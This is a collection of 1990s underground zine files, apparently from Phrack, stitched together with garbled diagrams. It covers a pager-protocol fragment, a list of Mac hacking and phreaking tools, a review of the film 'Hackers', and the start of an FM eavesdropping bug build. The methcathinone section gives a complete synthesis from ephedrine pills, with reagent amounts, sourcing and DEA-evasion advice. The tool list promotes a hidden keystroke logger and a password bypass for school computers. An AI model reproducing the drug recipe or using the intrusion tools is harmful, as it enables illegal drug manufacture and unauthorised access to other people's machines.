FORMAT | 1 |     Message Bits     |   Parity Check Bits   |   Even parity   |

A batch consist of frame synchronization code follow by 8 frames of two address
codewords per frame (16 address codewords per batch). In order to maintain the
proper batch structure, each frame is filled with two address codewords, or two
idle codewords, or two message codewords, or any appropriate combination of the
three codewords types.

The frame synchronization (FS) code is a unique, reserved word that is used to
identify the beginning of each batch. The FS code comprises the 32 bits:


An alternate frame synchronization (AFS) code can be selected to support special
systems or systems that require increased coding capability. The AFS is
generated in the same manner as an address codeword (i.e., BCH codeword with
parity bits). The POCSAG signaling standard has reserved special codewords for
the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
system to support the AFS. The AFS will change to frame 0 on the programmer
since no frame information is included in the AFS. The AFS should use address
1 so that bit 20 and 21 are 0.

An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
the address bits. The pagers looks at these bits to find its own unique
address. Each POCSAG codeword is capable of providing address information for
four different paging sources (Address 1 to 4). These address are determined
by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits
22 through 31 are the parity check bits, and bit 32 is the even parity bit.

		BIT 20	    BIT 21
Address 1         0	      0
Address 2         0           1
Address 3         1           0
Address 4         1           1

Pre-coded into the code plug are three bits which designate the frame location,
within each batch, at which the pager's address is to be received; the decoder
will look at the codewords in this frame for its address.
Power is removed from the receiver during all frames other than the precoded
one, thus extending pager battery life.

The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres
bits are the most-significant bits.

A message codeword structure always start with a 1 in bit 1 and always follows
directly after the address. Each message codeword replaces an address codeword
in the batch.

The idle codeword is unique, reserved codeword used to talk place of an address
in any frame that would not otherwise be filled with 64 bits.
Thus, if a frame contains only an address, an idle codeword comprises the 32



		|			|			|
#	23	|	$	24	|	@	40	|
[	5B	|	\	5C	|	]	5D	|
^	5E	|	_	5F	|	'	60	|
{	7B	|	|	7C	|	}	7D	|
~ 	7E	|	DEL	7F	|	SP	20	|


by Logik Bomb

"My fellow astronauts..."
-Dan Quayle

        Now, two people have mailed Erik Bloodaxe asking about Macintosh
hacking particularly war dialers, and each time he insulted Macs and tried
to get someone to write a file on it. No one has done it. So I guess I have
        First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
originators of the Apple and the Macintosh were busted for phreaking in
college. The Apple IIe was used almost universally by hackers. So why has
the Mac fallen out of favor for hacking? Simple. Because it fell out of
favor for everything else. Apple screwed up and wouldn't let clone makers
license the MacOS. As a result, 80% of personal computers run DOS, and
Macintoshes are left in the minority. Second, DOS compatible users, and
hackers in particular, have an image of Mac users as a bunch of whiny
lamers who paid too much for a computer and as a result are constantly
defensive. The solution to this impression is to not be an asshole. I know
it drives every Mac user crazy when he reads some article about Windows
95's brand new, advanced features such as "plug-and-play" that the
Macintosh has had since 1984. But just try and take it. If it's any
consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
hate Windows too.
Now, on with the software.
Assault Dialer 1.5
        Assault Dialer, by Crush Commando, is the premier Mac war dialer,
the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
have right now.  It is the successor to a previous war dialer known as Holy
War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
1.0, and it wasn't as good as Assault Dialer, so that's your best bet right

MacPGP 2.6.2 and PGPfone 1.0b4
        MacPGP is the Macintosh port of the infamous PGP (Pretty Good
Privacy.) This file is not about cryptography, so if you want to know about
PGP read the fuckin' read me and docs that come with the file. Strangely
enough, however, Phil Zimmerman released PGPfone, a utility for encrypting
your phone and making it a secure line, for the Mac _first._ I don't know
why, and I haven't had a chance to test it, but the idea's pretty cool. If
PGP doesn't get Zimmerman thrown in jail, this will.

DisEase 1.0 and DisEase 3.0
        Schools and concerned parents have always had a problem. Schools
can't have students deleting the hard drive, and parents don't want their
kids looking at the kinky pictures they downloaded. So Apple came out with
At Ease, an operating system that runs over System 7, sort of the same way
Windows runs off of DOS. However, I can't stand At Ease. Everything about
it, from the Fisher-Price screen to the interface drives me crazy. It
drives a lot of other people crazy too. So it was just a matter of time
before someone made a program to override it. The first was DisEase 1.0, a
small program by someone calling himself Omletman, that would override At
Ease if you put in a floppy loaded with it and clicked six times. Omletman
improved this design and eventually released 3.0. (I haven't been able to
find any evidence that a 2.0 was ever released) 3.0 has such cool features
as reading the preferences file to give you the password, so you can change
the obnoxious greeting teachers always put to something more sinister. The
only problem with 3.0 is that some configurations of At Ease only let
documents be read off of disks; no applications, which means DisEase 3.0
won't appear, and so you can't run it. However, with 1.0 you don't have to
actually open the application, you just click six times, so if you use 1.0
to get to the finder, and then 3.0 to read the passwords, things will work.

Invisible Oasis Installer
        Oasis is a keystroke recorder, so you can find out passwords.
However, with the original Oasis, you had to put it in the Extensions
folder and make it invisible with ResEdit, which takes a while. Invisible
Oasis Installer, however, installs it where it should be and automatically
makes it invisible.
"So everything's wrapped up in a nice neat little _package_, then?"
-Homer Simpson

Anonymity 2.0 and Repersonalize 1.0
        Anonymity, version 1.2, was a rather old program whose author has
long been forgotten that was the best data fork alterer available. It
removed the personalization to programs. However, in around 1990 someone
named the Doctor made 2.0, a version with some improvements. Repersonalize
was made in 1988 (God, Mac hacking programs are old) which reset
personalization on some of the Microsoft and Claris programs, so you could
enter a different personalization name. I don't know if it will still work
on Microsoft Word 6.0.1 and versions of programs released recently, but I
don't really care because I use Word 5.1a and I'm probably not going to
upgrade for a while.

Phoney (AKA Phoney4Mac)
        Phoney is an excellent program that emulates the Blue Box, Red Box,
Black Box and Green Box tones. There is also Phoney4Newton, which does the
same thing on the most portable of computers, the Newton.

        That's all I'm covering in this file as far as Mac hacking
programs. You'll probably want to know where to find all this crap, so here
are all of the Mac hacking ftp and Web sites I know of:
Space Rogue's Whacked Mac Archives (
        This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
It is probably the largest and best archive of Mac hacking software
connected to the Internet. The problem with this is that it can't handle
more than two anonymous users, meaning that unless you pay to be part of
L0pht, you will never get into this archive. I've tried getting up at 4:30
AM, thinking that no one in their right mind would possibly be awake at
this time, but there is always, somehow, somewhere, two people in Iceland
or Singapore or somewhere on this site.
The Mac Hacking Home Page (
        This site does not look like much, and it is fairly obvious that
its maintainer, Sean Warren, is still learning HTML, but it is reliable and
is a good archive. It is still growing, probably due to the fact that it is
one of the only Internet Mac hacking sites anyone can get to and upload.
Kn0wledge Phreak <k0p> (
        This is an excellent site and has many good programs. There is one
catch, however. It's maintainer, Ole Buzzard, is actually getting the files
from his BBS. So many of the really good files are locked away in the k0p
BBS, and those of us who can't pay long distance can't get the files. Oh
Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
        While this is hardly a Macintosh hacking site, it's just a hacking
site, it does have very few Mac files, some of which are hard to get to.
However, Bone might get expelled because of a long story involving AOHell,
so this page might not be here. Then again, maybe Bone won't get expelled
and this site will stay. Never can tell 'bout the future, can you?
"We predict the future. We invent it."
        -Nasty government guy on the season premiere of _The X-Files_

Andy Ryder
Netsurfer and Road Warrior on the Info Highway
I've pestered Bruce Sterling _and_ R.U. Sirius!
As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
Once scored 29,013,920 points on Missile Command

"This Snow Crash thing- is it a virus, a drug, or a religion?"
        -Hiro Protagonist
"What's the difference?"
        -Juanita Marquez

" person's 'cyberpunk' is another's everyday obnoxious teenager with
some technical skill thrown in..."
        -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
"More than _some_ technical skill."
        -Andy Ryder


                            Making Methcathinone


                                by Anonymous

Ok, this has got to be the easiest drug made at home (by far).  This is very
similar to methamphetamine in structure, effect, and use.  Typical doses
start at 20mg up to 60mg.  Start low, go slow.  Cat can be taken orally (add
10 mg) or through mucous membranes (nasally).

Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
Conc. Sulfuric acid - it's up to you where you get this.  Contact me if you
                      need help locating it.
Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
                                     is used for cleaning concrete.
Sodium Hydroxide - Hardware stores.  AKA lye.
Toluene - Hardware store, paint store.

Lab equipment:
1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
125 mL separatory funnel - same as above
glass tubing - same as above

Buchner funnel - This is a hard to find item, but must schools have at least
                 one.  They are usually white porcelain or plastic.  They look
                 like a funnel with a flat disk in the bottom with lots of
                 holes in it.  If you need one, arrangements can be made.
Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00

References to Edmund's Scientific Co, in NJ, are accurate.  You have to go 
to their "Lab Surplus/Mad Scientist" room.  The prices are incredible.  
This place is definitely a recommended stopping sight for anybody going 
through New Jersey.  It is located in "Barrington", about 30 minutes from 
center city Philadelphia.
All of the above can be purchased from "The Al-Chymist".  Their number is
(619)948-4150.  Their address is:       17525 Alder #49
                                       Hesperia, Ca 92345
      Call and ask for a catalog.

That's it.  The body of this article is stolen from the third edition of
"Secrets of Methamphetamine Manufacture" by Uncle Fester.  This is a tried
and proven method by many people.  If you want a copy of this book, contact

                  Good luck and keep away from the DEA

                          M E T H C A T H I N O N E

             K I T C H E N    I M P R O V I E S E D    C R A N K

    The latest designer variant upon the amphetamine molecule to gain
popularity and publicity is methcathinone, commonly called cat.  This
substance is remarkably similar to the active ingredient found in the
leaves of the khat tree which the loyal drug warriors on the network news
blame for turning peace loving Somalis into murderous psychopaths.  The
active ingredient in the khat leaves is cathinone, which has the same
structural relationship to methcathinone that amphetamine has to
methamphetamine.  It is made by oxidizing ephedrine, while meth can be
made by reducing ephedrine. 

    The high produced by methcathinone is in many ways similar to
methamphetamine.  For something so easily made and purified, it is
actually quite enjoyable.  the main differences between the meth high and
the methcathinone high are length of action and body fell.  With
methcathinone, one can expect to still get to sleep about 8 hours after a
large dose.  On the down side, it definitely gives me the impression that
the substance raises the blood pressure quite markedly.  This drug may not
be safe for people with weak hearts of blood vessels.  Be warned! 

    Cat is best made using chrome in the +6 oxidation state as the
oxidizer. I recall seeing an article in the narco swine's Journal of
Forensic Science bragging about how they worked out a method for making it
using permanganate, but that method gives an impure product in low yields. 
Any of the common hexavalent chrome salts can be used as the oxidizer in
this reaction.  This list include chrome trioxide (CrO3), sodium or
potassium chromate (Na2CrO4), and sodium or potassium dichromate
(Na2Cr2O7).  All of these chemicals are very common.  Chrome trioxide is
used in great quantities in chrome plating. The chromates are used in
tanning and leather making. 

    To make methcathinone, the chemist starts with the water extract of
ephedrine pills.  The concentration of the reactants in this case is not
critically important, so it is most convenient to use the water extract of
the pills directly after filtering without any boiling away of the water.
See the section at the beginning of Chapter 15 [I included this at the end
of the file] on extracting ephedrine form pills.  Both ephedrine
hydrochloride and sulfate can be used in this reaction. 

    The water extract of 1000 ephedrine pills is placed into any
convenient glass container.  A large measuring cup is probably best since
it has a pouring lip.  Next, 75 grams of any of the above mentioned +6
chrome compounds are added.  They dissolve quite easily to form a reddish
or orange colored solution.  Finally, concentrated sulfuric acid is added. 
If CrO3 is being used, 21 mL is enough for the job.  If one of the
chromates is being used, 42 mL is called for.  These ingredients are
thoroughly mixed together, and allowed to sit for several hours with
occasional stirring. 

    After several hours have passed, lye solution is added to the batch
until it is strongly basic. Very strong stirring accompanies this process
to ensure that the cat is converted to the free base.  Next, the batch is
poured into a sep funnel, and a couple hundred mLs of toluene is added.
Vigorous shaking, as usual, extracts the cat into the toluene layer.  It
should be clear to pale yellow in color.  The water layer should be orange
mixed with green.  The green may settle out as a heavy sludge.  The water
layer is thrown away, and the toluene layer containing the cat is washed
once with water, then poured into a beaker. Dry HCl gas is passed through
the toluene as described in Chapter 5 [I included this at the end of the file]
to get white crystals of cat.  The yield is between 15 and 20
grams.  This reaction is scaled up quite easily. 

CHAPTER 15 (part of it anyway)

 P R O C E D U R E   F O R   O B T A I N I N G   P U R E   E P H E D R I N E
                   F R O M   S T I M U L A N T   P I L L S

    In the present chemical supply environment, the best routes for making
meth start with ephedrine as the raw material.  To use these routes, a
serious hurdle must first be overcome.  This hurdle is the fact that the
most easily obtained source of ephedrine, the so-called stimulant or
bronchodilator pills available cheaply by mail order, are a far cry from
the pure starting material a quality minded chemist craves.  Luckily,
there is a simple and very low profile method for separating the fillers
in these pills from the desired active ingredient they contain. 

    A superficial paging through many popular magazines[New Body is where
I found it at GNC] reveals them to be brim full of ads
from mail order outfits offering for sale "stimulant" or "bronchodilator"
pills. These are the raw materials today's clandestine operator requires
to manufacture meth without detection.  The crank maker can hide amongst
the huge herd of people who order these pills for the irritating and
nauseating high that can be had by eating them as is.  I have heard of a
few cases where search warrants were obtained against people who ordered
very large numbers of these pills, but I would think that orders of up to
a few thousand pills would pass unnoticed.  If larger numbers are
required, maybe one's friends could join in the effort. 

    The first thing one notices when scanning these ads is the large
variety of pills offered for sale. When one's purpose is to convert them
into methamphetamine, it is very easy to eliminate most of the pills
offered for sale.  Colored pills are automatically rejected because one
does not want the coloring to be carried into the product.  Similarly,
capsules are rejected because individually cutting open capsules is just
too much work. Bulky pills are to be avoided because they contain too much
filler.  The correct choice is white cross thins, preferably containing
ephedrine HCl instead of sulfate, because the HCl salt can be used in more
of the reduction routes than can the sulfate. 

    Once the desired supply of pills is in hand, the first thing which
should be done is to weigh them.  This will give the manufacturer an idea
of how much of the pills is filler, and how much is active ingredient. 
Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
contains 25 grams of active ingredient.  A good brand of white cross thins
will be around 33% to 40% active ingredient.  25 grams of ephedrine HCl
may not sound like much, but if it is all recovered from these pills, it
is enough to make from 1/2 to 3/4 ounce of pure meth.  This is worth three
or four thousand dollars, not a bad return on the twenty odd dollars a
thousand lot of such pills costs. [I don't know where he got 3 or 4
thousand dollars from, but the pills go for about $35.00/1000 now. 2
months ago they were $25.00 but now they have to do more paper work
because it is a DEA controlled substance]

    To extract the ephedrine from the pills, the first thing which must be
done is to grind them into a fine powder.  This pulverization must be
thorough in order to ensure complete extraction of the ephedrine form the
filler matrix in which it is bound.  A blender does a fine job of this
procedure, as will certain brands of home coffee grinders. 

    Next, the powder from 1000 pills is put into a glass beaker, or other
similar container having a pouring lip, and about 300 mL of distilled
water is added.  Gentle heat is then applied to the beaker, as for example
on a stove burner, and with steady stirring the contents of the beaker are
slowly brought up to a gentle boil.  It is necessary to stir constantly
because of the fillers will settle to the bottom of the beaker and cause
burning if not steadily stirred. 

    Once the contents of the beaker have been brought to a boil, it is
removed from the heat and allowed to settle.  Then the water is poured out
of the beaker through a piece of filter paper.  The filtered water should
be absolutely clear.  Next, another 50 mL of water is added to the pill
filler sludge, and it too is heated with stirring.  Finally, the pill
sludge is poured into the filter, and the water it contains is allowed to
filter through.  It too should be absolutely clear, and should be mixed in
with the first extract.  A little water may be poured over the top of the
filler sludge to get the last of the ephedrine out of it.  This sludge
should be nearly tasteless, and gritty in texture.  The water extract
should taste very bitter, as it contains the ephedrine. 

    The filtered water is now returned to the stove burner, and half of
the water it contains is gently boiled away.  Once this much water has
been boiled off, precautions should be taken to avoid burning the
ephedrine.  The best alternative is to evaporate the water off under a
vacuum.  If this is not practical with the equipment on hand, the water
may be poured into a glass baking dish.  This dish is then put into the
oven with the door cracked open, and the lowest heat applied.  In no time
at all, dry crystals of ephedrine HCl can be scraped out of the baking
dish with a razor blade. The serious kitchen experimenter may wish to
further dry them in a microwave. 

Chapter 5 (The part about the HCl gas)

    A source of anhydrous hydrogen chloride gas is now needed.  The
chemist will generate his own.  The glassware is set up as in Figure 1. 
He will have to bend another piece of glass tubing to the shape shown.  It
should start out about 18 inches long.  One end of it should be pushed
through a one hole stopper.  A 125 mL sep funnel is the best size.  The
stoppers and joints must be tight, since pressure must develop inside this
flask to force the hydrogen chloride gas out through the tubing as it is

    Into the 1000 mL, three-necked flask is placed 200 grams of table
salt. Then 25% concentrated hydrochloric acid is added to this flask until
it reaches the level shown in the figure.  The hydrochloric acid must be
of laboratory grade [I use regular muriatic acid for pools].

Figure 1:
                   \     /
                  \   /ķ
                 ֽ        ӷ   <--125 mL separatory funnel
                 ӷ        ֽ
                  ķ    Ľ        glass tubing Ŀ
                    ӷ  ֽ                        
           stopcock->ۺĴ                     Salt and Hydrochloric acid
stopper ->ķ     \/з      ķ <-1 hole    mixed into a paste by add-
          ĺ               ĺ    stopper  ing HCL to salt and mixing.
      Ľ   Ľ    Ľ  ķ         The surface should be rough
     ֽ                                ӷ        and a good number of holes
                                                should be poked into the
            1000 mL, 3 neck flask               paste for long lasting
                                                generation of HCl gas.
     ӷ   acid/salt level   ֽ        
      ķ                             Ľ         
        ķ                       Ľ           
           ķ         Ľ              

    Some concentrated sulfuric acid (96-98%) is put into the sep funnel
and the spigot turned so that 1 mL of concentrated sulfuric acid flows
into the flask.  It dehydrates the hydrochloric acid and produces hydrogen
chloride gas. This gas is then forced by pressure through the glass

    One of the Erlenmeyer flasks containing methamphetamine in solvent is
placed so that the glass tubing extends into the methamphetamine, almost
reaching the bottom of the flask.  Dripping in more sulfuric acid as
needed keeps the flow of gas going to the methamphetamine.  If the flow if
gas is not maintained, the methamphetamine may solidify inside the glass
tubing, plugging it up. 

    Within a minute of bubbling, white crystals begin to appear in the
solution, More and more of them appear as the process continues.  It is an
awe-inspiring sight.  In a few minutes, the solution becomes as thick as
watery oatmeal. 

    It is now time to filter out the crystals, which is a two man job. 
The flask with the crystals in it is removed from the HCl source and
temporarily set aside.  The three-necked flask is swirled a little to
spread around the sulfuric acid and then the other Erlenmeyer flask is
subjected to a bubbling with HCl.  While this flask is being bubbled, the
crystals already in the other flask are filtered out. 

    The filtering flask and Buchner funnel are set up as shown in figure
2. The drain stem of the buchner funnel extends all the way through the
rubber stopper, because methamphetamine has a nasty tendency to dissolve
rubber stoppers.  This would color the product black.  A piece of filter
paper covers the flat bottom of the Buchner funnel.  The vacuum is turned
on and the hose attached to the vacuum nipple.  Then the crystals are
poured into the Buchner funnel.  The solvent and uncrystallized
methamphetamine pass through the filter paper and the crystals stay in the
Buchner funnel as a solid cake.  About 15 mL of solvent is poured into the
Erlenmeyer flask. the top of the flask is covered with the palm and it is
shaken to suspend the crystals left clinging to the sides.  This is also
poured into the Buchner funnel.  Finally, another 15 mL of solvent is
poured over the top of the filter cake. 

Figure 2:
                                          <-Bchner Funnel
                              \           /
                                \       /
                                  \   /
                                        <--To vacuum

    Now the vacuum hose is disconnected and the Buchner funnel, stopper
and all, is pulled from the filtering flask.  All of the filtered solvent
is poured back into the erlenmeyer flask it came from.  It is returned to
the HCl source for more bubbling.  The Buchner funnel is put back into the
top of the filtering flask.  It still contains the filter cake of
methamphetamine crystals.  It will now be dried out a little bit.  The
vacuum is turned back on, the vacuum hose is attached to the filtering
flask, and the top of the Buchner funnel is covered with the palm or
section of latex rubber glove.  The vacuum builds and removes most of the
solvent from the filter cake.  This takes about 60 seconds.  The filter
cake can now be dumped out onto a glass or China plate (not plastic) by
tipping the Buchner funnel upside-down and tapping it gently on the plate. 

    And so, the filtering process continues, one flask being filtered
while the other one is being bubbled with HCl.  Solvent is added to the
Erlenmeyer flask to keep their volumes at 300 mL.  Eventually, after each
flask has been bubbled for about seven times, no more crystal will come
out and the underground chemist is finished. 

    If ether was used as the solvent, the filter cakes on the plates will
be nearly dry now.  With a knife from the silverware drawer, the cakes are
cut into eighths.  They are allowed to dry out some more then chopped up
into powder.  If benzene was used, this process takes longer.  Heat lamps
may be used to speed up this drying, but no stronger heat source. 

[The above section of chapter 5 is talking about methamphetamine.  You
could, in most instances, substitute the word methcathinone, but I wanted
to present the text to you in its exact form.]


Review of "HACKERS"

By Wile Coyote

Sorry, it might be a little long...  cut it to ribbons if you want, most 
of it is just a rant anyway...  Hope you enjoy it.

  First off, I have to admit that I was biased going into the movie 
"Hackers"...  I heard that it wasn't going to be up to snuff, but did I 
let that stop me?  No, of course not...  I sucked up enough courage to 
stride towards my girlfriend and beg for seven bucks... :)  She ended up 
wanting to see the movie herself (and sadly, she rather enjoyed it...  
oh, well, what can you do with the computer illiterate or is it the 
computer illegitimate?). Now onto....


  (Yes, I AM going to give you a second-by-second playback of the 
movie...  you don't want me to spoil the plot, you say?  Well, don't 
worry, there is no plot to spoil! :) just kidding, go see it... maybe 
you'll like it...)
  Well, from the very first few seconds, I was unimpressed...  It begins 
with an FBI raid on some unsuspecting loose (who turns out to be the 
main character, but that's later) named Zero Cool (can you say "EL1EEEEET 
WaReZ D00D!!!!!!!1!!!!!111!!!!").  The cinematography was bad...  (Hey, 
cinematography counts!) But, the acting was worse.  The Feds bust into 
this home and run up the stairs, all while this lady (the mom) just kind 
of looks on dumbfounded and keeps saying stuff like "hey, stop that...", 
or something (is this what a raid is like?  I've never had the pleasure...)

Ok, so the story goes on like this:  The 11 year old kid made a computer 
virus that he uploads to, I think, the NY stock exchange, and it crashes 
1,507 computers.  There is a really lame court scene where the kid is 
sentenced to 7 years probation where he can't use a computer or a 
touch-tone phone...  That was 1988...

Time passes...  Now it's 1995, and boy have things changed (except the 
mom... hmmm....).  Now the ex-hacker is allowed to use a computer (his 
18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) 
boxing some TV station to change the program on television (yes, I know 
that all of you super-el33t hackers hack into TV stations when you don't 
like what's on Ricki Lake!).  N-e-way, while hacking into their 
super-funky system (the screen just kind of has numbers moving up and 
down the screen like some kind of hex-editor on acid...)
he gets into a "hacking battle" with some other hacker called Acid Burn 
(I don't think I have ever seen such a trippy view of the "Internet"...  
lots of Very high-end graphics, not very realistic, but it's Hollywood...).
In the end, the other hacker kicks the shit out of him (he has changed 
his handle to Crash Override now, just to be cool, i guess) and logs him 
off the TV station.  Wow, tense... cough...

For those of you who care, let me describe the "hacker" Crash Override:  
He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is 
(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) 
clothes, and the CDC might have quite a bit to say about the amount of 
leather he wears... I mean, there are limits to that kind of stuff, man!
And to top off his coolness, he is, like, the roller-blade king of the 
world.  (Not that hackers don't roller-blade, but he does it just Soooo 
much cooler than I could... :) ).  And yet, here's the nifty part, 
despite all of his deft coolness, he couldn't get a girl for the life 
of him (we all morn for him in silent prayer).  

Ok, so now Crash is at school, and he meets Wonderchick (who is 
EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she 
is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to 
spoil the suspense).

Now, while at school, he wants to hook up with wonderchick, so he breaks 
into the school's computer (it must be a fucking Cray to support all of 
the high-end-type graphics that this dude is pulling up) and gets his 
English(?) class changed to hers.  So, some other super-d00dcool hacker 
spots him playing around with the schools computer (it's funny how may 
elite hackers one can meet in a new york public school...), so he 
catches up with Crash and invites you to an elite (Oh, if you ever want 
to see a movie where the word 3l333333333t is used, like a fucking 
million times, then go see Hackers...) hackerz-only club, complete with 
million-dollar virtual-reality crap and even a token phreaker trying to 
red-box a pay-phone with a cassette recorder (never mind that the music is 
about 197 decibels, the phone can still pick up the box tones...).

What follows is that Crash meets up with some seriously k-rad hackers 
(Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and  
Phantom Phreak : who reminds of that gay kid on "my so called life...  
maybe that was him?";Lord Nikon : the token black hacker... Photographic 
memory is his super-power).  They talk about k00l pseudo-hacker shit and 
then a l00ser warez-type guy comes up and tries to be El33t like everybody 
else.  He is just about the ONLY realistic character in the whole movie.  
He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?".  He keeps 
saying "I need a handle, then I'll be el33t!".  (Why he can't just pick 
his own handle, like The Avenging Turd or something, is beyond me... He 
plays lamer better than the kids in Might Morphin Power Rangers...  awesome 
actor!).  N-e-way, this is where the major discrepancies start.  Ok, 
first they try to "test" Lamerboy by asking him what the four most used 
passwords are.  According to the movie, they are "love, sex, god, and 
secret".  (Hmmmm.... I thought Unix required a 6-8 char. password....).  
Somehow lamerboy got into a bank and screwed with an ATM machine four 
states away; all of the hacker chastise him for being stupid and hacking 
at home (If you watch the movie, you'll notice that the hackers use just 
about every pay-phone in the city to do their hacking, no, THAT doesn't 
look suspicious)Next they talk about "hacking a Gibson".  
(I was informed that they WANTED to use "hacking a Cray", 
but the Cray people decided that they didn't want THAT kind of publicity.  
I've never heard of a Gibson in real life, though...).  
They talk about how k-powerful the security is on a Gibson, and they say 
that if Lamerboy can crack one, then he gets to be elite.  

Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash 
loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy 
finally cracks a Gibson with the password God (never mind a Login name or 
anything that cool).  Then the cheese begins in full force.  The Gibson 
is like a total virtual-reality thingy.  Complete with all sorts of cool 
looking towers and neon lightning bolts and stuff.  Lamerboy hacks into a 
garbage file (did I mention that the entire world is populated by Macs?  
Oh, I didn't...   well, hold on :)...).  So, this sets alarms off all 
over the place (cause a top-secret file is hidden in the garbage, see?), 
and the main bad-guy, security chief Weasel, heads out to catch him.  He 
plays around with some neon, star-trek-console, buttons for a while, 
then calls the "feds" to put a trace on the kid.  La de da, ess catches him 
in a second, and the kid only gets half of the file, which he hides.
(to spoil the suspense, yet again, the file is some kind of money getting 
program, like the kind some LOD members wrote about a long time ago in 
Phrack, which pulls money from each transaction and puts it into 
a different account.  Needless to say, the Security Weasel is the guy who 
wrote it, which is why he needs it back, pronto!).

As we travel along the movie, the hackers keep getting busted for tapping 
into the Gibson, and they keep getting away.  The "action" heats up when 
Wonderchick and Crash get into a tiff and they decide to have a hacking 
contest...  They go all over the city trying their best to fuck with 
the one fed they don't like....  Brilliant move, eh? The movie kind of 
reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
They all fondle over the machine with the same intensity that Captain Kirk 
gave to fighting Klingons, and frankly, their acting abilities seems 
to ask "please deposit thirty-five cents for the next three minutes". 
It was funny listening to the actors, 'cause they didn't know shit about 
what they were saying...  Here's a clip:

Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem...  Not 
Kbps, mind you :)...I wonder where they designed a .8 of a bit?)

Yeah! Cool... Hey what kind of chip does it have in it?

A P6!  Three times faster than a Pentium....  Yep, RISC is the wave of 
the future...  (I laughed so hard.....  Ok, first of all, it is a Mac.  
Trust me, it has the little apple on the cover.  Second it has a P6, what 
server she ripped this out of, I dare not ask.  How she got that 
bastard into a laptop without causing the casing to begin melting is 
yet another problem...  those get very hot, i just read about them 
in PC magazine (wow, I must be elite too).  Finally, this is a *magic* P6, 
because it has RISC coding....  

I kinda wished I had stayed for the credits to see the line: 

Technical advisor                      None.... died on route to work...)

Finally they ask something about the screen, and they find out it is 
an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!

They do lots of nifty things with their magic laptops (I noticed that they 
ALL had laptops, and they were ALL Macintoshes.  Now, I'm not one to say 
you can't hack on a mac, 'cause really you can hack on a TI-81 if you've 
got the know.... but please, not EVERYONE in the fucking movie 
has to have the exact same computer (different colors, though... there 
was a really cool clear one).... it got really sad at the end), and they 
finally find out what the garbage file that Lamerboy stole was, this time 
using a hex editor/CAD program of some sort.

As we reach the end of the movie, the hackers enlist the help of two very 
strangely painted phone phreaks who give the advice to the hackers to send 
a message to all of the hackers on the 'net, and together, they all 
kicked some serious ass with the super-nifty-virtual-reality Gibson.

In the end, all of the Hackers get caught except for one, who pirates all 
of the TV station in the world and gives the police the "real" story...  
So, the police politely let them go, no need for actually proving that the 
evidence was real or anything, of course.

So, in the end, I had to say that the movie was very lacking.  It seemed 
to be more of a Hollywood-type flashy movie, than an actual documentary 
about hackers.  Yes, I know an ACTUAL movie about hacker would suck, but 
PLEASE, just a LITTLE bit of reality helps keep the movie grounded.  It 
may have sucked less if they didn't put flashing, 64 million color, 
fully-rendered, magically delicious pictures floating all over the screen 
instead of just a simple "# " prompt at the bottom.  With all of the 
super-easy access to all of the worlds computers, as depicted in the movie, 
ANYBODY can be a hacker, regardless of knowledge, commitment, or just 
plain common sense.  And that's what really made it suck... 

Hope you enjoyed my review of HACKERS!



                         ==Phrack Magazine==

              Volume Seven, Issue Forty-Eight, File 4 of 18

                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                 PART II


 |     CONSTRUCTING AN FM BUG        |
 |      --------------------         |
 |                                   |
 |       written by                  |
 |    +         Obi-1                |
 |       *|
 | *   *                             |
 |                                   |
 |   $     Written for Phrack        |
 |  x$x    if any other magazine     |
 |   $     wishes to print this      |
 |  x$x    article they must let the |
 |         author know in advance    |


        Before anything this article sole purpose is to teach everyone
out there about electronics. If you do build it use it at your own risk.
You will need a decent knowledge of electronics and how to solder some
components. So if you dont know how to build electronic kits and want a
bug you can buy one ready-made from me, just write to the e-mail address
above. Ok enough crap.. so you ask what is an FM bug, well an FM bug is
like a tiny microphone that can transmit crystal clear audio to a near
by Walkman/stereo etc. The range of the bug we are making is about 800
meters, and the battery life is about 100hrs on a normal alkaline
battery. This bug however is not to be moved while in use, so you cant
put it in your pocket and walk around. There are other bugs on the
market but this I found to be the most reliable and relatively easy to
build. The actual size of the PCB is only 2cm X 2cm! However the battery
is actually the biggest component. Some parts like the Surface Mount
resistors, air trimmer and electret microphone maybe hard to find. I
find mail-order catalogs are the best source of parts as they have a
bigger range than a store like Dick Smith. I did not actually design
this circuit, Talking Electronics did, but felt everyone out there might
like to know how to build one of these. The surface mount resistors can
be replaced with normal resistors but I recommend using the surface
mount resistors as they give more of an educational experience to this
project <puke> <puke> If you dont have a clue how to build a bug and
have no knowledge of electronics whatsoever e-mail me and you can
purchase one pre-built from me.


 1- 470 R surface mount
 1- 10k surface mount
 1- 47k surface mount
 1- 68k surface mount
